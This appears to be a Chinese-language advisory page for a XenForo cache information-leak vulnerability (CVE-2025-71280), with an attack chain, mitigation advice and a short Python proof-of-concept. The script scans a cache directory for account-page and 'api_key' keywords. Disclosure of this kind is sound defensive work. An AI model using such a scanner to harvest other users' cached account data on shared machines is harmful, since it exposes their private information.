CVE-2025-71280 CVSS 6.2 中危

CVE-2025-71280 XenForo本地账户页面缓存信息泄露漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71280

漏洞类型

信息泄露

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

XenForo

漏洞概述

XenForo在2.3.7之前的版本存在信息泄露漏洞。由于本地账户页面缓存机制的问题，在多用户共享浏览器或计算机的系统上，缓存的账户页面可能将敏感用户信息暴露给其他本地用户。攻击者无需认证即可利用此漏洞获取他人隐私数据。

技术细节

该漏洞的根本原因在于XenForo在处理用户个人账户页面时，未能在共享系统环境下正确实施严格的缓存控制策略。当用户登录并访问账户相关页面时，Web服务器或浏览器会将包含敏感个人信息（如邮箱、设置等）的静态资源存储在本地缓存中。在多用户共享同一台主机或浏览器配置文件的场景下，若前一位用户未正常退出或清除缓存，后续获得访问权限的本地用户可以通过检查浏览器缓存目录、查看页面源代码缓存或利用浏览器后退功能，直接还原并读取前一位用户的账户页面内容。由于攻击向量为本地且无需认证，这构成了显著的隐私泄露风险。

攻击链分析

STEP 1

步骤1

攻击者获得共享系统或浏览器的访问权限。

STEP 2

步骤2

攻击者检查浏览器缓存目录或使用后退按钮查看历史记录。

STEP 3

步骤3

攻击者从缓存中读取其他用户的账户页面，获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2025-71280
# This script demonstrates checking browser cache for cached XenForo account data.
import os

def check_cache(directory):
    """Scans a directory for potential cached sensitive data."""
    print(f"[*] Scanning directory: {directory}")
    # Keywords often found in XenForo account pages
    sensitive_keywords = ["account/preferences", "account/security", "email=", "api_key"]
    
    if not os.path.exists(directory):
        print("[-] Directory does not exist.")
        return

    for root, dirs, files in os.walk(directory):
        for file in files:
            file_path = os.path.join(root, file)
            try:
                with open(file_path, 'rb') as f:
                    content = f.read(1024) # Read first 1KB
                    if content:
                        for keyword in sensitive_keywords:
                            if keyword.encode('utf-8') in content:
                                print(f"[!] Potential leak found in: {file_path}")
                                print(f"    Matched keyword: {keyword}")
                                break
            except (IOError, PermissionError):
                continue

# Example usage path (would be actual browser cache path in exploitation)
# check_cache("C:\\Users\\Public\\Cache")
print("PoC generated for educational purposes.")

影响范围

XenForo < 2.3.7

防御指南

临时缓解措施

建议用户在公共或共享设备上访问论坛后，务必点击退出登录并手动清除浏览器缓存。管理员应尽快更新XenForo至修复版本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表